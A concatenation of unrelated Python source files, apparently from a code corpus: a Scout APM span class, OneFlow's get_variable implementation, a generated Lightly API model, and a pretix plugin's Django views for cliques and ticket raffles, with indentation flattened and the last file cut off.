def is_ignored(self):
return self.tags.get("ignore_transaction", False)
class Span(object):
def __init__(self, *args, **kwargs):
self.span_id = kwargs.get("span_id", "span-" + str(uuid4()))
self.start_time = kwargs.get("start_time", datetime.utcnow())
self.end_time = kwargs.get("end_time", None)
self.request_id = kwargs.get("request_id", None)
self.operation = kwargs.get("operation", None)
self.ignore = kwargs.get("ignore", False)
self.ignore_children = kwargs.get("ignore_children", False)
self.parent = kwargs.get("parent", None)
self.tags = kwargs.get("tags", {})
if objtrace is not None:
self.start_objtrace_counts = kwargs.get(
"start_objtrace_counts", objtrace.get_counts()
)
else:
self.start_objtrace_counts = kwargs.get(
"start_objtrace_counts", (0, 0, 0, 0)
)
self.end_objtrace_counts = kwargs.get("end_objtrace_counts", (0, 0, 0, 0))
def stop(self):
self.end_time = datetime.utcnow()
if objtrace is not None:
self.end_objtrace_counts = objtrace.get_counts()
else:
self.end_objtrace_counts = (0, 0, 0, 0)
def tag(self, key, value):
if key in self.tags:
logger.debug(
"Overwriting previously set tag for span %s: %s", self.span_id, key
)
self.tags[key] = value
# In seconds
def duration(self):
if self.end_time is not None:
return (self.end_time - self.start_time).total_seconds()
else:
# Current, running duration
return (datetime.utcnow() - self.start_time).total_seconds()
# Add any interesting annotations to the span. Assumes that we are in the
# process of stopping this span.
def annotate(self):
self.tag("allocations", self.calculate_allocations())
# Don't capture backtraces for Controller or Middleware
if self.operation is not None:
if self.operation.startswith("Controller") or self.operation.startswith(
"Middleware"
):
return
slow_threshold = 0.500
if self.duration() > slow_threshold:
self.capture_backtrace()
def calculate_allocations(self):
if objtrace is None:
return 0
start_allocs = (
self.start_objtrace_counts[0]
+ self.start_objtrace_counts[1]
+ self.start_objtrace_counts[2]
)
end_allocs = (
self.end_objtrace_counts[0]
+ self.end_objtrace_counts[1]
+ self.end_objtrace_counts[2]
)
try:
# If even one of the counters rolled over, we're pretty much
# guaranteed to have end_allocs be less than start_allocs.
# This should rarely happen. Max Unsigned Long Long is a big number
if end_allocs - start_allocs < 0:
logger.debug(
"End allocation count smaller than start allocation "
"count for span %s: start = %d, end = %d",
self.span_id,
start_allocs,
end_allocs,
)
return 0
return end_allocs - start_allocs
except TypeError as e:
logger.debug("Exception in calculate_allocations: %r", e)
return 0
def capture_backtrace(self):
stack = scout_apm.core.backtrace.capture()
self.tag("stack", stack)
|
the-stack_0_25241
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from typing import Optional, Sequence, Union
import oneflow._oneflow_internal
from oneflow._oneflow_internal.oneflow.core.register import logical_blob_id as lbi_util
from oneflow.compatible import single_client as flow
from oneflow.compatible.single_client.eager import boxing_util as boxing_util
from oneflow.compatible.single_client.eager import gradient_util as gradient_util
from oneflow.compatible.single_client.eager import op_executor as op_executor
from oneflow.compatible.single_client.experimental import namescope as name_scope
from oneflow.compatible.single_client.framework import (
compile_context as compile_context,
)
from oneflow.compatible.single_client.framework import distribute as distribute_util
from oneflow.compatible.single_client.framework import hob as hob
from oneflow.compatible.single_client.framework import remote_blob as remote_blob_util
from oneflow.compatible.single_client.framework import runtime_mode as rt_mode
from oneflow.compatible.single_client.framework import session_context as session_ctx
from oneflow.compatible.single_client.support import enable_if as enable_if
from oneflow.core.job import initializer_conf_pb2 as initializer_conf_util
from oneflow.core.job import regularizer_conf_pb2 as regularizer_conf_util
from oneflow.core.operator import op_conf_pb2 as op_conf_util
from oneflow.core.register import logical_blob_id_pb2 as logical_blob_id_util
blob_register = oneflow._oneflow_internal.GetDefaultBlobRegister()
def api_get_variable(
name: str,
shape: Optional[Sequence[int]] = None,
dtype: Optional[flow.dtype] = flow.float32,
initializer: Optional[initializer_conf_util.InitializerConf] = None,
regularizer: Optional[regularizer_conf_util.RegularizerConf] = None,
trainable: Optional[bool] = None,
model_name: Optional[str] = None,
random_seed: Optional[int] = None,
parallel_distribution: Optional[
Union[
Sequence[oneflow._oneflow_internal.distribute.Distribute],
Sequence[str],
str,
]
] = None,
distribute: Optional[oneflow._oneflow_internal.distribute.Distribute] = None,
reuse: bool = True,
) -> oneflow._oneflow_internal.BlobDesc:
"""Create a variable or retrieve an existing one.
Args:
name: Name of this variable. One variable could be shared by multiple OneFlow functions. `None` by default
shape: Shape of the variable. `None` by default
dtype: Data type of the variable. `None` by default
initializer: An initializer object. For instance, a :func:`~oneflow.compatible.single_client.ones_initializer`. `None` by default
trainable: A `bool` to indicate if this variable is trainable. `True` by default
model_name: A `string`. `'weight'` or `'bias'`. `None` by default
random_seed: Random seed for random initializers. `None` by default
For example:
Example 1:
.. code-block:: python
import oneflow.compatible.single_client as flow
import oneflow.compatible.single_client.typing as tp
def watch_handler(y: tp.Numpy):
print("out", y)
@flow.global_function()
def variable_Job() -> None:
init = flow.constant_initializer(1.25)
variable = flow.get_variable(
"variable-weight",
shape=(1, 3, 2, 2),
initializer=init,
trainable=True
)
flow.watch(variable, watch_handler)
checkpoint = flow.train.CheckPoint()
checkpoint.init()
variable_Job()
# out [[[[1.25 1.25]
# [1.25 1.25]]
# [[1.25 1.25]
# [1.25 1.25]]
# [[1.25 1.25]
# [1.25 1.25]]]]
Example 2:
.. code-block:: python
import oneflow.compatible.single_client as flow
import numpy as np
import oneflow.compatible.single_client.typing as tp
def conv2d(input, filters, kernel_size, strides, padding, name):
input_shape = input.shape
weight_initializer = flow.truncated_normal(0.1)
weight_regularizer = flow.regularizers.l2(0.0005)
weight_shape = (filters,
input_shape[1],
kernel_size[0],
kernel_size[1])
weight = flow.get_variable(
name + "-weight",
shape=weight_shape,
initializer=weight_initializer,
regularizer=weight_regularizer,
)
return flow.nn.conv2d(input, weight, strides, padding, name=name)
@flow.global_function()
def conv2d_Job(x: tp.Numpy.Placeholder((1, 64, 32, 32))
) -> tp.Numpy:
conv = conv2d(x,
filters=128,
kernel_size=[3, 3],
strides=2,
padding='SAME',
name="ConvLayer")
return conv
x = np.random.randn(1, 64, 32, 32).astype(np.float32)
out = conv2d_Job(x)
# out.shape (1, 128, 16, 16)
"""
if distribute is not None:
assert parallel_distribution is None
parallel_distribution = [distribute]
if parallel_distribution is None:
parallel_distribution = []
if isinstance(parallel_distribution, str):
parallel_distribution = parallel_distribution.split(",")
assert isinstance(parallel_distribution, (list, tuple))
def distribute_to_str(dist):
if dist is None:
return ""
elif type(dist) is str:
return dist
elif type(dist) is oneflow._oneflow_internal.distribute.SplitDistribute:
return "S({})".format(dist.axis)
elif type(dist) is oneflow._oneflow_internal.distribute.BroadcastDistribute:
return "B"
else:
raise ValueError("unsupported distribute")
parallel_distribution = list(map(distribute_to_str, parallel_distribution))
api = enable_if.unique([get_lazy_variable, get_eager_variable])
return api(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
model_name=model_name,
random_seed=random_seed,
parallel_distribution=parallel_distribution,
reuse=reuse,
)
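# A small illustrative sketch of how the parallel_distribution argument is
# normalized by api_get_variable above; the concrete values are assumptions,
# only the behavior of distribute_to_str is taken from this file.
def _example_parallel_distribution_forms():
    # A comma-separated string is split into parts:         "S(0),B" -> ["S(0)", "B"]
    # SplitDistribute / BroadcastDistribute objects render as "S(axis)" / "B".
    # The legacy `distribute=` argument is wrapped into a one-element list first.
    return ["S(0)", "B"]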
@enable_if.condition(hob.in_global_mode & hob.eager_execution_enabled)
def get_eager_variable(
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
model_name=None,
random_seed=None,
parallel_distribution=None,
reuse=True,
):
assert isinstance(name, str)
assert isinstance(
shape, (list, tuple)
), "param shape should be a list or tuple of dimension"
job_name = oneflow._oneflow_internal.JobBuildAndInferCtx_GetCurrentJobName()
name = name_scope.GetJobNameScopePrefix(job_name) + name
sess = session_ctx.GetDefaultSession()
(var_blob, job_var_blob) = sess.TryGetVariableBlobOfJobFromStash(job_name, name)
if reuse is False:
assert (
job_var_blob is None
), "variable '{}' already exists, getting the same variable is not allowed when reuse is False".format(
name
)
if job_var_blob is None:
op_conf = GenerateVariableOpConf(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
model_name=model_name,
random_seed=random_seed,
parallel_distribution=parallel_distribution,
)
op_attribute = compile_context.CurJobAddConsistentOp(op_conf)
if var_blob is None:
var_blob = CreateEagerVariableBlob(op_attribute)
op_executor.EagerInitVariableBlob(sess, op_conf, var_blob)
assert isinstance(var_blob, oneflow._oneflow_internal.EagerConsistentBlob)
sess.StashVariableBlob4Job(job_name, op_conf.name, var_blob)
else:
assert isinstance(job_var_blob, oneflow._oneflow_internal.EagerConsistentBlob)
assert isinstance(var_blob, oneflow._oneflow_internal.EagerConsistentBlob)
assert var_blob.IdenticalTo(job_var_blob)
bw_blob_register = gradient_util.GetDefaultBackwardBlobRegister()
bw_blob_register.TrySetObject4BlobName(
var_blob.logical_blob_name, var_blob.blob_object
)
return var_blob
@enable_if.condition(hob.in_global_mode & ~hob.eager_execution_enabled)
def get_lazy_variable(
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
model_name=None,
random_seed=None,
parallel_distribution=None,
reuse=True,
):
assert isinstance(name, str)
assert isinstance(
shape, (list, tuple)
), "param shape should be a list or tuple of dimension"
job_name = oneflow._oneflow_internal.JobBuildAndInferCtx_GetCurrentJobName()
name = name_scope.GetJobNameScopePrefix(job_name) + name
sess = session_ctx.GetDefaultSession()
(var_blob, job_var_blob) = sess.TryGetVariableBlobOfJobFromStash(job_name, name)
if reuse is False:
assert (
job_var_blob is None
), "variable '{}' already exists, getting the same variable is not allowed when param reuse is False".format(
name
)
if job_var_blob is None:
op_conf = GenerateVariableOpConf(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
model_name=model_name,
random_seed=random_seed,
parallel_distribution=parallel_distribution,
)
job_var_blob = _CreateVariableBlob(op_conf)
assert isinstance(job_var_blob, oneflow._oneflow_internal.LazyConsistentBlob)
sess.StashVariableBlob4Job(job_name, op_conf.name, job_var_blob)
if var_blob is not None:
assert isinstance(var_blob, oneflow._oneflow_internal.LazyConsistentBlob)
assert var_blob.IdenticalTo(job_var_blob)
else:
assert isinstance(job_var_blob, oneflow._oneflow_internal.LazyConsistentBlob)
assert isinstance(var_blob, oneflow._oneflow_internal.LazyConsistentBlob)
assert var_blob.IdenticalTo(job_var_blob)
return job_var_blob
def GenerateVariableOpConf(
name,
shape,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
model_name=None,
random_seed=None,
parallel_distribution=None,
):
op_conf = op_conf_util.OperatorConf()
op_conf.name = name
op_conf.variable_conf.shape.dim.extend(shape)
assert dtype is not None
op_conf.variable_conf.data_type = oneflow._oneflow_internal.deprecated.GetProtoDtype4OfDtype(
dtype
)
if rt_mode.CurrentMode() == rt_mode.NORMAL_MODE:
root_path = None
else:
root_path = (
compile_context.GetCurJobConfigProto().default_initialize_with_snapshot_path()
)
dir_path = os.path.join(root_path, name)
file_path = os.path.join(dir_path, "out")
if root_path and os.path.isfile(file_path):
op_conf.variable_conf.initialize_with_snapshot.path = dir_path
op_conf.variable_conf.initialize_with_snapshot.key = "out"
else:
if root_path:
print("{} not found, will be initialized".format(file_path))
if initializer is not None:
op_conf.variable_conf.initializer.CopyFrom(initializer)
if regularizer is not None:
op_conf.variable_conf.regularizer.CopyFrom(regularizer)
if trainable is not None:
op_conf.variable_conf.trainable = trainable
if model_name is not None:
op_conf.variable_conf.model_name = model_name
if parallel_distribution is None:
parallel_distribution = []
op_conf.variable_conf.parallel_distribution.extend(parallel_distribution)
if random_seed is not None:
op_conf.variable_conf.random_seed = random_seed
op_conf.variable_conf.out = "out"
return op_conf
def _CreateVariableBlob(op_conf):
compile_context.CurJobAddConsistentOp(op_conf)
lbi = logical_blob_id_util.LogicalBlobId()
lbi.op_name = op_conf.name
lbi.blob_name = op_conf.variable_conf.out
return remote_blob_util.RemoteBlob(lbi)
def CreateEagerVariableBlob(op_attribute, job_name=""):
bn_in_op2blob_object = oneflow._oneflow_internal.deprecated.BnInOp2BlobObject()
def BuildInstruction(builder):
parallel_conf = flow.current_scope().device_parallel_desc_symbol.parallel_conf
cfg_op_attribute = oneflow._oneflow_internal.deprecated.MakeOpAttributeByString(
str(op_attribute)
)
builder.StatelessCall(
cfg_op_attribute, parallel_conf, bn_in_op2blob_object, boxing_util.BoxingTo
)
oneflow._oneflow_internal.deprecated.LogicalRun(BuildInstruction)
lbi = lbi_util.LogicalBlobId()
lbi.set_op_name(op_attribute.op_conf.name)
lbi.set_blob_name(op_attribute.op_conf.variable_conf.out)
if not isinstance(lbi, lbi_util.LogicalBlobId):
cfg_lbi = lbi_util.LogicalBlobId()
cfg_lbi.set_op_name(lbi.op_name)
cfg_lbi.set_blob_name(lbi.blob_name)
lbi = cfg_lbi
return oneflow._oneflow_internal.EagerConsistentBlob(
lbi,
blob_object=bn_in_op2blob_object["out"],
blob_register=blob_register,
job_name=job_name,
)
|
the-stack_0_25246
|
# coding: utf-8
"""
Lightly API
Lightly.ai enables you to do self-supervised learning in an easy and intuitive way. The lightly.ai OpenAPI spec defines how one can interact with our REST API to unleash the full potential of lightly.ai # noqa: E501
OpenAPI spec version: 1.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from lightly.openapi_generated.swagger_client.configuration import Configuration
class TaskName(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
}
attribute_map = {
}
def __init__(self, _configuration=None): # noqa: E501
"""TaskName - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self.discriminator = None
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(TaskName, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, TaskName):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, TaskName):
return True
return self.to_dict() != other.to_dict()
|
the-stack_0_25249
|
import base64
import hmac
from collections import defaultdict
from django import forms
from django.contrib import messages
from django.db import transaction
from django.db.models import Count, Exists, OuterRef
from django.http import Http404, HttpResponse
from django.shortcuts import redirect, get_object_or_404
from django.urls import reverse
from django.utils.decorators import method_decorator
from django.utils.functional import cached_property
from django.utils.translation import gettext_lazy as _, pgettext_lazy
from django.views import View
from django.views.decorators.clickjacking import xframe_options_exempt
from django.views.generic import DeleteView, ListView, TemplateView, FormView
from django_scopes import scopes_disabled
from pretix_cliques.tasks import run_raffle, run_rejection
from pretix import settings
from pretix.base.models import Order, SubEvent, OrderPosition, OrderRefund, Event
from pretix.base.views.metrics import unauthed_response
from pretix.base.views.tasks import AsyncAction
from pretix.control.forms.widgets import Select2
from pretix.control.permissions import EventPermissionRequiredMixin
from pretix.control.views import UpdateView
from pretix.control.views.orders import OrderView
from pretix.multidomain.urlreverse import eventreverse
from pretix.presale.views import EventViewMixin
from pretix.presale.views.order import OrderDetailMixin
from .checkoutflow import CliqueCreateForm, CliqueJoinForm
from .models import Clique, OrderClique, OrderRaffleOverride
class CliqueChangePasswordForm(forms.Form):
password = forms.CharField(
max_length=190,
label=_('New clique password'),
help_text=_("Optional"),
min_length=3,
required=False,
)
def __init__(self, *args, **kwargs):
self.event = kwargs.pop('event')
super().__init__(*args, **kwargs)
@method_decorator(xframe_options_exempt, 'dispatch')
class OrderCliqueChange(EventViewMixin, OrderDetailMixin, TemplateView):
template_name = 'pretix_cliques/order_clique_change.html'
def dispatch(self, request, *args, **kwargs):
self.request = request
if not self.order:
raise Http404(_('Unknown order code or not authorized to access this order.'))
if not self.order.can_modify_answers:
messages.error(request, _('The clique for this order cannot be changed.'))
return redirect(self.get_order_url())
if self.order.status not in (Order.STATUS_PENDING, Order.STATUS_EXPIRED, Order.STATUS_PAID):
messages.error(request, _('The clique for this order cannot be changed.'))
return redirect(self.get_order_url())
return super().dispatch(request, *args, **kwargs)
@transaction.atomic
def post(self, request, *args, **kwargs):
self.request = request
mode = request.POST.get("clique_mode")
if mode == "leave":
try:
c = self.order.orderclique
c.delete()
self.order.log_action("pretix_cliques.order.left", data={
'clique': c.pk
})
messages.success(request, _('Okay, you left your clique successfully. How do you want to continue?'))
return redirect(eventreverse(self.request.event, 'plugins:pretix_cliques:event.order.clique.modify',
kwargs={
'order': self.order.code,
'secret': self.order.secret,
}))
except OrderClique.DoesNotExist:
pass
elif mode == "change":
if self.change_form.is_valid():
try:
c = self.order.orderclique
if c.is_admin:
c.clique.password = self.change_form.cleaned_data['password']
c.clique.save()
self.order.log_action("pretix_cliques.order.changed", data={
'clique': c.pk
})
messages.success(request, _('Okay, we changed the password. Make sure to tell your friends!'))
return redirect(self.get_order_url())
except OrderClique.DoesNotExist:
pass
elif mode == 'join':
if self.join_form.is_valid():
clique = self.join_form.cleaned_data['clique']
OrderClique.objects.create(
clique=clique,
order=self.order
)
self.order.log_action("pretix_cliques.order.joined", data={
'clique': clique.pk
})
messages.success(request, _('Great, we saved your changes!'))
return redirect(self.get_order_url())
elif mode == 'create':
if self.create_form.is_valid():
clique = Clique(event=self.request.event)
clique.name = self.create_form.cleaned_data['name']
clique.password = self.create_form.cleaned_data['password']
clique.save()
OrderClique.objects.create(
clique=clique,
order=self.order,
is_admin=True
)
self.order.log_action("pretix_cliques.order.created", data={
'clique': clique.pk
})
messages.success(request, _('Great, we saved your changes!'))
return redirect(self.get_order_url())
elif mode == 'none':
messages.success(request, _('Great, we saved your changes!'))
return redirect(self.get_order_url())
messages.error(self.request, _("We could not handle your input. See below for more information."))
return self.get(request, *args, **kwargs)
@cached_property
def change_form(self):
return CliqueChangePasswordForm(
event=self.request.event,
prefix='change',
data=self.request.POST if self.request.method == "POST" and self.request.POST.get(
"clique_mode") == "change" else None
)
@cached_property
def create_form(self):
return CliqueCreateForm(
event=self.request.event,
prefix='create',
data=self.request.POST if self.request.method == "POST" and self.request.POST.get(
"clique_mode") == "create" else None
)
@cached_property
def join_form(self):
return CliqueJoinForm(
event=self.request.event,
prefix='join',
data=self.request.POST if self.request.method == "POST" and self.request.POST.get(
"clique_mode") == "join" else None
)
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
ctx['order'] = self.order
ctx['join_form'] = self.join_form
ctx['create_form'] = self.create_form
ctx['change_form'] = self.change_form
try:
c = self.order.orderclique
ctx['clique'] = c.clique
ctx['is_admin'] = c.is_admin
except OrderClique.DoesNotExist:
ctx['selected'] = self.request.POST.get("clique_mode", 'none')
return ctx
def dispatch(self, request, *args, **kwargs):
self.request = request
return super().dispatch(request, *args, **kwargs)
class ControlCliqueForm(forms.ModelForm):
class Meta:
model = OrderClique
fields = ['clique', 'is_admin']
def __init__(self, *args, **kwargs):
self.event = kwargs.pop('event')
super().__init__(*args, **kwargs)
self.fields['clique'].queryset = self.event.cliques.all()
class RaffleOverrideChange(OrderView):
permission = 'can_change_orders'
def post(self, request, *args, **kwargs):
mode = request.POST.get('mode')
if mode not in dict(OrderRaffleOverride.MODE_CHOICES):
mode = OrderRaffleOverride.MODE_NORMAL
OrderRaffleOverride.objects.update_or_create(
order=self.order,
defaults={
'mode': mode
}
)
self.order.log_action('pretix_cliques.chance.changed', data={
'mode': mode
}, user=self.request.user)
messages.success(request, _('Great, we saved your changes!'))
return redirect(self.get_order_url())
class ControlCliqueChange(OrderView):
permission = 'can_change_orders'
template_name = 'pretix_cliques/control_order_clique_change.html'
@cached_property
def form(self):
try:
instance = self.order.orderclique
except OrderClique.DoesNotExist:
instance = OrderClique(order=self.order)
return ControlCliqueForm(
data=self.request.POST if self.request.method == "POST" else None,
instance=instance,
event=self.request.event
)
def get_context_data(self, **kwargs):
ctx = super().get_context_data()
ctx['form'] = self.form
return ctx
def post(self, request, *args, **kwargs):
if self.form.is_valid():
self.form.save()
messages.success(request, _('Great, we saved your changes!'))
return redirect(self.get_order_url())
messages.error(self.request, _("We could not handle your input. See below for more information."))
return self.get(request, *args, **kwargs)
class CliqueList(EventPermissionRequiredMixin, ListView):
permission = 'can_change_orders'
template_name = 'pretix_cliques/control_list.html'
context_object_name = 'cliques'
paginate_by = 25
def get_queryset(self):
return self.request.event.cliques.all()
class CliqueForm(forms.ModelForm):
class Meta:
model = Clique
fields = ['name', 'password']
def __init__(self, *args, **kwargs):
self.event = kwargs.pop('event')
super().__init__(*args, **kwargs)
def clean_name(self):
name = self.cleaned_data.get('name')
if Clique.objects.filter(event=self.event, name=name).exclude(pk=self.instance.pk).exists():
raise forms.ValidationError(
_('Duplicate clique name'),
code='duplicate_name'
)
return name
class CliqueDetail(EventPermissionRequiredMixin, UpdateView):
permission = 'can_change_orders'
template_name = 'pretix_cliques/control_detail.html'
context_object_name = 'clique'
form_class = CliqueForm
def get_queryset(self):
return self.request.event.cliques.all()
def form_valid(self, form):
form.save()
form.instance.log_action("pretix_cliques.clique.changed", data=form.cleaned_data, user=self.request.user)
messages.success(self.request, _('Great, we saved your changes!'))
return redirect(reverse('plugins:pretix_cliques:event.cliques.list', kwargs={
'organizer': self.request.organizer.slug,
'event': self.request.event.slug,
}))
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
ctx['orders'] = self.object.ordercliques.select_related('order')
return ctx
class CliqueDelete(EventPermissionRequiredMixin, DeleteView):
permission = 'can_change_orders'
template_name = 'pretix_cliques/control_delete.html'
context_object_name = 'clique'
def get_queryset(self):
return self.request.event.cliques.all()
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
ctx['orders'] = self.object.ordercliques.select_related('order')
return ctx
@transaction.atomic
def delete(self, request, *args, **kwargs):
o = self.object = self.get_object()
o.log_action("pretix_cliques.clique.deleted", data={
"name": o.name
}, user=request.user)
for oc in self.object.ordercliques.select_related('order'):
oc.order.log_action("pretix_cliques.order.deleted", data={
'clique': o.pk
}, user=request.user)
oc.delete()
o.delete()
messages.success(self.request, _('The clique has been deleted.'))
return redirect(reverse('plugins:pretix_cliques:event.cliques.list', kwargs={
'organizer': self.request.organizer.slug,
'event': self.request.event.slug,
}))
class RaffleForm(forms.Form):
subevent = forms.ModelChoiceField(
SubEvent.objects.none(),
label=pgettext_lazy('subevent', 'Date'),
required=True,
)
number = forms.IntegerField(
label=_('Number of tickets to raffle'),
help_text=_('The end result can differ by as much as the size of the largest clique'),
required=True
)
max_addons = forms.IntegerField(
label=_('Maximum number of add-on products to raffle'),
help_text=_('Add-on tickets generally do not affect raffle results, but once this number of add-on products '
'has won, additional tickets with add-on products will no longer win.'),
required=True,
initial=999999,
)
def __init__(self, *args, **kwargs):
self.event = kwargs.pop('event')
super().__init__(*args, **kwargs)
if self.event.has_subevents:
self.fields['subevent'].queryset = self.event.subevents.all()
self.fields['subevent'].widget = Select2(
attrs={
'data-inverse-dependency': '#id_all_subevents',
'data-model-select2': 'event',
'data-select2-url': reverse('control:event.subevents.select2', kwargs={
'event': self.event.slug,
'organizer': self.event.organizer.slug,
}),
'data-placeholder': pgettext_lazy('subevent', 'All dates')
}
)
self.fields['subevent'].widget.choices = self.fields['subevent'].choices
else:
del self.fields['subevent']
class RejectForm(forms.Form):
subevent = forms.ModelChoiceField(
SubEvent.objects.none(),
label=pgettext_lazy('subevent', 'Date'),
required=True,
)
def __init__(self, *args, **kwargs):
self.event = kwargs.pop('event')
super().__init__(*args, **kwargs)
if self.event.has_subevents:
self.fields['subevent'].queryset = self.event.subevents.all()
self.fields['subevent'].widget = Select2(
attrs={
'data-inverse-dependency': '#id_all_subevents',
'data-model-select2': 'event',
'data-select2-url': reverse('control:event.subevents.select2', kwargs={
'event': self.event.slug,
'organizer': self.event.organizer.slug,
}),
'data-placeholder': pgettext_lazy('subevent', 'All dates')
}
)
self.fields['subevent'].widget.choices = self.fields['subevent'].choices
else:
del self.fields['subevent']
class RaffleView(EventPermissionRequiredMixin, AsyncAction, FormView):
template_name = 'pretix_cliques/control_raffle.html'
permission = 'can_change_orders'
form_class = RaffleForm
task = run_raffle
known_errortypes = ['OrderError']
def get(self, request, *args, **kwargs):
if 'async_id' in request.GET and settings.HAS_CELERY:
return self.get_result(request)
return FormView.get(self, request, *args, **kwargs)
def get_form_kwargs(self):
k = super().get_form_kwargs()
k['event'] = self.request.event
return k
def form_valid(self, form):
return self.do(
self.request.event.pk,
subevent_id=form.cleaned_data['subevent'].pk if form.cleaned_data.get('subevent') else None,
user_id=self.request.user.pk,
raffle_size=form.cleaned_data['number'],
max_addons=form.cleaned_data['max_addons'],
)
def get_success_message(self, value):
return _('The raffle has been performed, {count} orders have been approved.').format(count=value)
def get_success_url(self, value):
return reverse('plugins:pretix_cliques:event.raffle', kwargs={
'organizer': self.request.organizer.slug,
'event': self.request.event.slug,
})
def get_error_url(self):
return reverse('plugins:pretix_cliques:event.raffle', kwargs={
'organizer': self.request.organizer.slug,
'event': self.request.event.slug,
})
def get_error_message(self, exception):
if isinstance(exception, str):
return exception
return super().get_error_message(exception)
def form_invalid(self, form):
messages.error(self.request, _('Your input was not valid.'))
return super().form_invalid(form)
class RaffleRejectView(EventPermissionRequiredMixin, AsyncAction, FormView):
template_name = 'pretix_cliques/control_raffle_reject.html'
permission = 'can_change_orders'
form_class = RejectForm
task = run_rejection
known_errortypes = ['OrderError']
def get(self, request, *args, **kwargs):
if 'async_id' in request.GET and settings.HAS_CELERY:
return self.get_result(request)
return FormView.get(self, request, *args, **kwargs)
def get_form_kwargs(self):
k = super().get_form_kwargs()
k['event'] = self.request.event
return k
def form_valid(self, form):
return self.do(
self.request.event.pk,
subevent_id=form.cleaned_data['subevent'].pk if form.cleaned_data.get('subevent') else None,
user_id=self.request.user.pk,
)
def get_success_message(self, value):
return _('{count} orders have been rejected.').format(count=value)
def get_success_url(self, value):
return reverse('plugins:pretix_cliques:event.raffle.reject', kwargs={
'organizer': self.request.organizer.slug,
'event': self.request.event.slug,
})
def get_error_url(self):
return reverse('plugins:pretix_cliques:event.raffle.reject', kwargs={
'organizer': self.request.organizer.slug,
'event': self.request.event.slug,
})
def get_error_message(self, exception):
if isinstance(exception, str):
return exception
return super().get_error_message(exception)
def form_invalid(self, form):
messages.error(self.request, _('Your input was not valid.'))
return super().form_invalid(form)
class StatsMixin:
def get_ticket_stats(self, event):
qs = OrderPosition.objects.filter(
order__event=event,
).annotate(
has_clique=Exists(OrderClique.objects.filter(order_id=OuterRef('order_id')))
)
return [
{
'id': 'tickets_total',
'label': _('All tickets, total'),
'qs': qs.filter(order__status=Order.STATUS_PENDING, order__require_approval=True),
'qs_cliq': True
},
{
'id': 'tickets_registered',
'label': _('Tickets registered for raffle'),
'qs': qs.filter(order__status=Order.STATUS_PENDING, order__require_approval=True),
'qs_cliq': True
},
{
'id': 'tickets_approved',
'label': _('Tickets in approved orders (regardless of payment status)'),
'qs': qs.filter(order__require_approval=False),
'qs_cliq': True
},
{
'id': 'tickets_paid',
'label': _('Tickets in paid orders'),
'qs': qs.filter(order__require_approval=False, order__status=Order.STATUS_PAID),
},
{
'id': 'tickets_pending',
'label': _('Tickets in pending orders'),
'qs': qs.filter(order__require_approval=False, order__status=Order.STATUS_PENDING),
},
{
'id': 'tickets_canceled',
'label': _('Tickets in canceled orders (except the ones not chosen in raffle)'),
'qs': qs.filter(order__require_approval=False, order__status=Order.STATUS_CANCELED),
},
{
'id': 'tickets_canceled_refunded',
'label': _('Tickets in canceled and at least partially refunded orders'),
'qs': qs.annotate(
has_refund=Exists(OrderRefund.objects.filter(order_id=OuterRef('order_id'), state__in=[OrderRefund.REFUND_STATE_DONE]))
).filter(
price__gt=0, order__status=Order.STATUS_CANCELED, has_refund=True
),
},
{
'id': 'tickets_denied',
'label': _('Tickets denied (not chosen in raffle)'),
'qs': qs.filter(order__require_approval=True, order__status=Order.STATUS_CANCELED),
'qs_cliq': True
},
]
class StatsView(StatsMixin, EventPermissionRequiredMixin, TemplateView):
template_name = 'pretix_cliques/control_stats.html'
permission = 'can_view_orders'
def get_context_data(self, **kwargs):
def qs_by_item(qs):
d = defaultdict(lambda: defaultdict(lambda: 0))
for r in qs:
d[r['item']][r['subevent']] = r['c']
return d
def qs_by_clique(qs):
d = defaultdict(lambda: defaultdict(lambda: 0))
for r in qs:
d[r['has_clique']][r['subevent']] = r['c']
return d
def qs_by_unique_clique(qs):
d = defaultdict(lambda: defaultdict(lambda: 0))
for r in qs:
d[r['has_clique']][r['subevent']] = r['cc']
return d
def qs_by_subevent(qs):
d = defaultdict(lambda: defaultdict(lambda: 0))
for r in qs:
d[r['subevent']][r['item']] = r['c']
return d
ctx = super().get_context_data()
ctx['subevents'] = self.request.event.subevents.all()
ctx['items'] = self.request.event.items.all()
